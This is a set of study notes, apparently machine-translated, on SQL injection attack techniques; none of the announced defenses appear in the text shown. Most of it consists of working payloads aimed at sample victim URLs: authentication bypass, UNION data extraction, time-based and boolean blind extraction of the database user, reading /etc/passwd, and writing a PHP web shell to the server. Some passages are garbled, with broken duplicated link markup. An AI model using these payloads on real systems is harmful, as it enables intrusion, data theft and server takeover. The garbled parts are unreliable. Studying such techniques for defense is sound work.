SQL injection attacks and defenses

SQL injection attacks and defenses

Partial finishing ...

What is SQL injection?

Simple example, for a shopping site, can be allowed to search, price less than a certain value of goods

This value can be entered by the user, for example, 100

But for the user, if input, 1 ' OR ' = ' 1

The result is the resulting SQL,

   SELECT *from Productstblwhere Price < ' 100.00 ' OR ' 1 ' = ' 1 ' ORDER by ProductDescription;

So that users can get all the product information

Let's look at an example,

For user authentication, you need to enter a user name and password

But if the user injects code into the password,

  SELECT useridfrom cmsuserswhere user = ' foo ' and password = ' password ' OR ' 1 ' = ' 1 ';

This makes it possible to verify

Injection type inline SQL injection (inline SQL injection)

Inline injection is a query injected with some SQL code, the original query will still be executed all

String inline injection

Example

With the following SQL, all passwords in the users table are updated to New_password, which is quite serious

  UPDATE usersset password = ' new_password ' WHERE username = ' Bob ' and password = ' old_password ' OR ' 1 ' = ' 1 '

numeric values Inline injection

Note that you do not need to add the opening and closing single quote delimiters when injecting numbers.

  SELECT *from messageswhere uid=45 or 1=1/* Yong-true conditions */order by received;

Because the 1=1 condition (or) is injected, the database returns all rows in the message table, not just the rows sent to a user

End-of-SQL injection

Terminating SQL injection refers to the successful conclusion of the original query statement by commenting out the remainder of the original query statement when injecting the SQL code.

Example

Inject "' or 1=1;--" code

  SELECT *from administratorswhere username = ' or 1=1;--' and password = ';

Because of the 1=1 persistent condition, the statement returns all rows in the Administrators table.

  SELECT *from administratorswhere username = ' admin '/* ' and password = ' * * ';

Sometimes you may find that you cannot use double hyphens (-) on certain occasions.

In this case, you can replace the original comment in the SQL statement with a multiline comment (/* */).

This technique requires multiple vulnerable parameters, and you need to understand where these parameters are located in the SQL statement.

Execute multiple statements

SQL Server 6.0 introduces a server-side cursor in its schema, allowing strings containing multiple statements to be executed on the same connection handle.

All SQL Server versions after 6.0 support this feature and allow the following statements to be executed:

SELECT foo from bar; SELECT Foo2 from Bar2;

MySQL also introduced this feature in versions 4.1 and later, but it does not support this feature by default.

To take advantage of this technique, you first need to be able to terminate the first statement so that you can then connect any SQL code.

Example

  Http://www.victim.com/search.php?s=test '; Select ' <?php echo shell_exec ($_get["cmd"]);? > ' into OUTFILE '/var/www/victim.com/shell.php ';--

Time delay

Time delay is a powerful technique, although the Web server can hide errors or data, but must wait for the database to return the results, so you can use it to confirm the existence of SQL injection. This technique is particularly suitable for blinds.

The Microsoft SQL Server server contains a built-in command to introduce delays to the query: WAITFOR delay ' hours:minutes:seconds '. For example, to send the following request to the victim Web server, the server's response would take approximately 5 seconds:

  Http://www.victim.com/basket.aspx?uid=45;waitfor delay ' 0:0:5 ';--

The delay in the server response convinced us that we were injecting SQL code into the backend database

The MySQL database does not have a command equivalent to WAITFOR delay, but it can use a function that takes a long time to introduce the delay. The BENCHMARK function is a good choice.

Mysql> SELECT BENCHMARK (10000000,encode (' hello ', ' Mom '));

Injection attack mode

Injection first to determine what the backend is exactly what the database, specifically what version of the method depends on whether the blind, that is, whether the Web server will put back-end error or return value, returned to you

The basic method is to verify with the different syntax of the database,

For example, for the concatenation of strings, the syntax of each library is different.

Extracting data through UNION statements

By union you can add your own SQL and get more information.

  SELECT column-1,column-2,..., column-n from Table-1unionselect column-1,column-2,..., column-n from Table-2

The limitation of this method is that

The queries must return exactly the same number of columns. the data in the corresponding columns of the Statements must is of the same (or at least compatible) types.

How do you ensure that your SQL and original SQL have the same column number and type?

The way is, you can try each one,

  http://www.victim.com/products.asp?id=12+union+select+null--http://www.victim.com/products.asp?id=12+union+ select+null,null--http://www.victim.com/products.asp?id=12+union+select+null,null,null--

Keep trying until you get an error.

The same is true for types,

  http://www.victim.com/products.asp?id=12+union+select+ ' Test ', null,null,nullhttp://www.victim.com/products.asp? Id=12+union+select+null, ' Test ', null,null

Try to not error, description type matching

Example

For instance, the following URL would retrieve both the name of the current user and the name of the current database:

Http://www.victim.com/products.asp?id=12+union+select+NULL,system_user,db_name (), NULL

Using conditional statements

The conditional syntax for various databases,

Approach 1:time-based

On SQL Server, for instance, one of the first things your might want to know are whether the user performing the queries is The system administrator account, SA.

http://www.victim.com/products.asp?id=12;if+ (system_user= ' sa ') +waitfor+delay+ ' 0:0:5 '--

Approach 2:error-based

Http://www.victim.com/products.asp?id=12/is_srvrolemember (' sysadmin ')

If the following function returns 1, then 12/1 is still equal to 12; If the return 0,12/0 is obviously an exception, then the value of the subsequent function can be inferred

As an example, let's see how we can use a case statement to check, with our E-commerce application, whether the current user Is SA:

http://www.victim.com/products.asp?id=12/(case+when+ (system_user= ' sa ') +then+1+else+0+end)

Approach 3:content-based

Can avoid generating errors,

Http://www.victim.com/products.asp?id=12%2B (case+when+ (system_user+=+ ' sa ') +then+1+else+0+end)

Like the case above,

To change the subject to redundancy

Working with Strings

Http://www.victim.com/search.asp?brand=acme

Equal To,

HTTP://WWW.VICTIM.COM/SEARCH.ASP?BRAND=ACM '%2b ' e or Http://www.victim.com/search.asp?brand=ac '%2b ' m '%2b ' E

Because%2b, Escape is +

is also equivalent to,

Http://www.victim.com/search.asp?brand=ac '%2bchar (109)%2b ' E

This can be injected as follows,

Http://www.victim.com/search.asp?brand=ac '%2bchar (108%2b (case+when+ (system_user+=+ ' sa ') +then +1+else+0+end)% 2 B ' E

Judging by the conditions,

Http://www.victim.com/search.asp?brand=acme

Or

Http://www.victim.com/search.asp?brand=acle

The above attack only gets 1 bits of data, which can be extended to Len's judgment in order to determine Len using a dichotomy

+8) +then+1+else+0+end "href=" http://www.victim.com/products.asp?id=10/(case+when+ (Len (system_user) +>+8) +then +1+else+0+end ">+8" +then+1+else+0+end "href=" http://www.victim.com/products.asp?id=10/(case+when+ (Len (system_ User) +>+8) +then+1+else+0+end ">http://www.victim.com/products.asp?id=10/(case+when+ (Len (system_user) +> +8) +then+1+else+0+end

You can then use the dichotomy to find each char,

+128) +then+1+else+0+end) "href=" http://www.victim.com/products.asp?id=12/(case+when+ (ASCII (substring SYSTEM_USER) +>+128) +then+1+else+0+end ">+128) +then+1+else+0+end)" href= "http://www.victim.com/ products.asp?id=12/(case+when+ (ASCII (substring (select+system_user)) +>+128) +then+1+else+0+end ">http ://www.victim.com/products.asp?id=12/(case+when+ (ASCII (substring (select+system_user),) +>+128) +then+1+ Else+0+end)

Previous page

Exploiting the operating system

Accessing the file system

Read

The Load_file function also handles binary files transparently, which means, and a little bit of finesse we can use T He function to read binary files from the remote host easily:

Such as

' Union Select Load_file ('/etc/passwd ') #

INSERT INTO Foo set line=load_file ('/tmp/temp.bin ');

Write

AAA ' Union Select NULL, ' SensePost 2008\n ' into DumpFile '/tmp/sp.txt ' #

Executing operating system commands

Exploiting Second-order SQL Injection

The first attack request, just put the attack script, write storage, such as database

The second request, the attack script will be read out from the library, triggering the execution, this will produce a real attack

Finding Second-order Vulnerabilities

Second-order SQL Injection is more difficult to detect than first-order vulnerabilities, because your exploit is submitted In one request and executed in the application ' s handling of a different request.

Previous page

SQL injection attacks and defenses